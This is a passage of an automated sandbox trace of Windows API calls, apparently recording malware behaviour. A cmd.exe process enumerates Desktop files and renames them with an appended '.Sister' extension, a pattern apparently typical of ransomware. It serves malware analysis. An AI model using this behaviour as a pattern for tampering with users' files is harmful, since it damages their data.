??_V@YAXPEAX@Z () returned 0x21ed90b0020 [0138.341] ??_V@YAXPEAX@Z () returned 0x1 [0138.341] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0138.342] FindNextFileW (in: hFindFile=0x21ed8c7cee0, lpFindFileData=0x21ed8d312b0 | out: lpFindFileData=0x21ed8d312b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="33_iBLAi.mp3", cAlternateFileName="")) returned 0 [0138.343] GetLastError () returned 0x12 [0138.343] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0138.344] ??_V@YAXPEAX@Z () returned 0x1 [0138.345] ??_V@YAXPEAX@Z () returned 0x1 [0138.345] ??_V@YAXPEAX@Z () returned 0x1 [0138.347] ??_V@YAXPEAX@Z () returned 0x1 [0138.347] GetProcessHeap () returned 0x21ed8c70000 [0138.347] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cee0 [0138.347] GetProcessHeap () returned 0x21ed8c70000 [0138.347] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ae0, Size=0x16) returned 0x21ed8c95780 [0138.347] GetProcessHeap () returned 0x21ed8c70000 [0138.347] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95780) returned 0x16 [0138.347] GetProcessHeap () returned 0x21ed8c70000 [0138.347] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0138.348] GetProcessHeap () returned 0x21ed8c70000 [0138.348] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0138.348] GetProcessHeap () returned 0x21ed8c70000 [0138.348] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cdd2b0 [0138.348] GetProcessHeap () returned 0x21ed8c70000 [0138.348] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd2b0, Size=0xb2) returned 0x21ed8cdd2b0 [0138.348] GetProcessHeap () returned 0x21ed8c70000 [0138.348] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd2b0) returned 0xb2 [0138.348] GetProcessHeap () returned 0x21ed8c70000 [0138.348] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d42620 [0138.349] GetProcessHeap () returned 0x21ed8c70000 [0138.349] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42620, Size=0x30) returned 0x21ed8d42620 [0138.349] GetProcessHeap () returned 0x21ed8c70000 [0138.349] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d42620) returned 0x30 [0138.349] GetProcessHeap () returned 0x21ed8c70000 [0138.349] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d42660 [0138.349] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0138.353] GetProcessHeap () returned 0x21ed8c70000 [0138.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c95f80 [0138.353] GetProcessHeap () returned 0x21ed8c70000 [0138.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96100 [0138.353] ??_V@YAXPEAX@Z () returned 0x1 [0138.354] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0138.357] GetProcessHeap () returned 0x21ed8c70000 [0138.357] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46d90 [0138.358] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed9080080, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0138.358] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0138.358] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.358] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0138.358] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0138.358] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7d111718, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7d111718, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0138.358] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0138.358] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8c7cf40 [0138.359] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.359] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0138.359] malloc (_Size=0x1ff9c) returned 0x21ed90a0030 [0138.359] ??_V@YAXPEAX@Z () returned 0x21ed90a0030 [0138.360] GetProcessHeap () returned 0x21ed8c70000 [0138.360] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cdd380 [0138.360] ??_V@YAXPEAX@Z () returned 0x1 [0138.360] ??_V@YAXPEAX@Z () returned 0x1 [0138.362] GetProcessHeap () returned 0x21ed8c70000 [0138.362] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42660, Size=0x490) returned 0x21ed8d42660 [0138.362] GetProcessHeap () returned 0x21ed8c70000 [0138.362] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d42660) returned 0x490 [0138.362] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0138.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.362] GetFileType (hFile=0x50) returned 0x2 [0138.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.362] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0138.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.365] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0138.372] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0138.372] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0138.372] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0138.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.372] GetFileType (hFile=0x50) returned 0x2 [0138.372] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.372] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0138.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.374] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0138.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.410] GetFileType (hFile=0x50) returned 0x2 [0138.410] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.410] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0138.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.432] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d42630*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d42630*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0138.449] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0138.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.449] GetFileType (hFile=0x50) returned 0x2 [0138.449] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.449] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0138.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.457] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0138.484] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0138.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.484] GetFileType (hFile=0x50) returned 0x2 [0138.484] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.484] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0138.502] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.502] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0138.511] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0138.528] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0138.529] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0138.530] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.533] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.533] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0138.534] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0138.534] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0138.534] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0138.534] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0138.534] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0138.534] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0138.534] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0138.534] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0138.534] ??_V@YAXPEAX@Z () returned 0x1 [0138.535] GetProcessHeap () returned 0x21ed8c70000 [0138.535] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdd400 [0138.535] GetProcessHeap () returned 0x21ed8c70000 [0138.535] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd400, Size=0x130) returned 0x21ed8cdd400 [0138.535] GetProcessHeap () returned 0x21ed8c70000 [0138.536] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd400) returned 0x130 [0138.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.536] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.536] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0138.536] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed9080080, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0138.541] ??_V@YAXPEAX@Z () returned 0x1 [0138.541] GetProcessHeap () returned 0x21ed8c70000 [0138.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cdd540 [0138.542] GetProcessHeap () returned 0x21ed8c70000 [0138.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdd680 [0138.542] GetProcessHeap () returned 0x21ed8c70000 [0138.542] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd680, Size=0x130) returned 0x21ed8cdd680 [0138.543] GetProcessHeap () returned 0x21ed8c70000 [0138.543] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd680) returned 0x130 [0138.543] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.543] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.543] GetProcessHeap () returned 0x21ed8c70000 [0138.543] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cc40 [0138.543] GetProcessHeap () returned 0x21ed8c70000 [0138.543] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31510 [0138.543] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0138.543] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0138.543] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0138.543] GetLastError () returned 0x2 [0138.543] GetProcessHeap () returned 0x21ed8c70000 [0138.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d48690 [0138.544] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d486a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0138.544] SetErrorMode (uMode=0x0) returned 0x0 [0138.544] SetErrorMode (uMode=0x1) returned 0x0 [0138.544] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed9080080, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0138.547] SetErrorMode (uMode=0x0) returned 0x1 [0138.547] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0138.547] GetProcessHeap () returned 0x21ed8c70000 [0138.547] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31780 [0138.548] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0138.548] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0138.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0138.548] GetLastError () returned 0x2 [0138.548] ??_V@YAXPEAX@Z () returned 0x1 [0138.548] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.548] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.550] malloc (_Size=0xffce) returned 0x21ed9090060 [0138.550] ??_V@YAXPEAX@Z () returned 0x21ed9090060 [0138.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0138.551] GetLastError () returned 0x2 [0138.551] _get_osfhandle (_FileHandle=2) returned 0x54 [0138.551] GetFileType (hFile=0x54) returned 0x2 [0138.552] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0138.552] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0138.561] _get_osfhandle (_FileHandle=2) returned 0x54 [0138.561] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0138.567] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0138.567] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0138.567] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0138.610] longjmp () [0138.610] ??_V@YAXPEAX@Z () returned 0x1 [0138.611] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ca0b80, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xb5f66820, ftLastAccessTime.dwHighDateTime=0x1d5e914, ftLastWriteTime.dwLowDateTime=0xb5f66820, ftLastWriteTime.dwHighDateTime=0x1d5e914, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="3Pvsa95E4Bhj9.jpg", cAlternateFileName="")) returned 1 [0138.611] GetProcessHeap () returned 0x21ed8c70000 [0138.611] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd160, Size=0xfa) returned 0x21ed8cdd7c0 [0138.611] GetProcessHeap () returned 0x21ed8c70000 [0138.611] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd7c0) returned 0xfa [0138.611] GetProcessHeap () returned 0x21ed8c70000 [0138.611] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58680 [0138.612] GetProcessHeap () returned 0x21ed8c70000 [0138.612] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58680, Size=0x30) returned 0x21ed8d58680 [0138.612] GetProcessHeap () returned 0x21ed8c70000 [0138.612] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58680) returned 0x30 [0138.612] GetProcessHeap () returned 0x21ed8c70000 [0138.612] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d586c0 [0138.612] malloc (_Size=0x1ff9c) returned 0x21ed90a0040 [0138.615] GetProcessHeap () returned 0x21ed8c70000 [0138.615] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8910 [0138.615] ??_V@YAXPEAX@Z () returned 0x1 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d586c0, Size=0x190) returned 0x21ed8d586c0 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d586c0) returned 0x190 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58860 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58860, Size=0x290) returned 0x21ed8d58860 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58860) returned 0x290 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58b00 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58b00, Size=0x30) returned 0x21ed8d58b00 [0138.617] GetProcessHeap () returned 0x21ed8c70000 [0138.618] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58b00) returned 0x30 [0138.618] GetProcessHeap () returned 0x21ed8c70000 [0138.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58b40 [0138.618] malloc (_Size=0x1ff9c) returned 0x21ed90a0040 [0138.624] GetProcessHeap () returned 0x21ed8c70000 [0138.624] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8710 [0138.624] ??_V@YAXPEAX@Z () returned 0x1 [0138.626] malloc (_Size=0x1ff9c) returned 0x21ed90a0040 [0138.630] GetFullPathNameW (in: lpFileName="3Pvsa95E4Bhj9.jpg", nBufferLength=0xffce, lpBuffer=0x21ed90a0040, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\3Pvsa95E4Bhj9.jpg", lpFilePart=0xa6cf4fe1c8*="3Pvsa95E4Bhj9.jpg") returned 0x29 [0138.630] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0138.631] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0138.631] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0138.658] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7d111718, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7d111718, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, 